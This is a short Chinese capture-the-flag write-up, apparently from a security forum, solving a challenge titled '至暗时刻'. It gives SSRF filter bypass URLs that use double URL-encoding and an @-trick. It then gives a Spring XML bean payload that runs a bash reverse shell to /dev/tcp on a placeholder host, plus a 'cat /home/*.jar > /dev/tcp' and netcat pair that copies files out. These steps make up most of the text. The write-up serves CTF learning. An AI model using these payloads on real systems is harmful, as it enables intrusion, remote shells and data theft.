-
-
[原创]第一题 至暗时刻
-
2020-11-19 10:57
3771
-
第一题 至暗时刻
需要ssrf127.0.0.1的8088端口 有正则需要带有 .pediy .com/ 测了一会儿发现使用urlencode两次就可以ssrf了
http://121.36.145.157:8088/getimage?url=http://127.0.0.1%253a8088%253f.pediy.com/loadConfig?url=http://ip/payload.xml
这样也可以绕ssrf 不过需要服务器写一个302跳转
http://121.36.145.157:8088/getimage?url=http://@@127.0.0.1:1234@m.pediy.com/loadConfig?url=http://127.0.0.1/
ssrf成功后发现需要xml
发现可以用FileSystemXmlApplicationContext 命令执行
https://www.cnblogs.com/afanti/p/10815728.html
使用这里的payload拿shell
1 2 3 4 5 6 7 8 9 10 | <?xml version = "1.0" encoding = "UTF-8" ?>
<beans xmlns = "http://www.springframework.org/schema/beans"
xmlns:xsi = "http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation = "
http: / / www.springframework.org / schema / beans http: / / www.springframework.org / schema / beans / spring - beans.xsd">
<bean id = "pb" class = "java.lang.ProcessBuilder" init - method = "start" >
<constructor - arg >
< list >
<value>bash< / value>
<value> - c< / value>
<value><![CDATA[bash >& / dev / tcp / ip / 2333 0 >& 1 ]]
|
拿到shell以后 把home下的jar下载回来
1 2 3 | cat / home / * .jar > / dev / tcp / ip / port
nc - lvnp port > 1.jar
|
用jd-gui 反编译拿到flag
[培训]《安卓高级研修班(网课)》月薪三万计划,掌
握调试、分析还原ollvm、vmp的方法,定制art虚拟机自动化脱壳的方法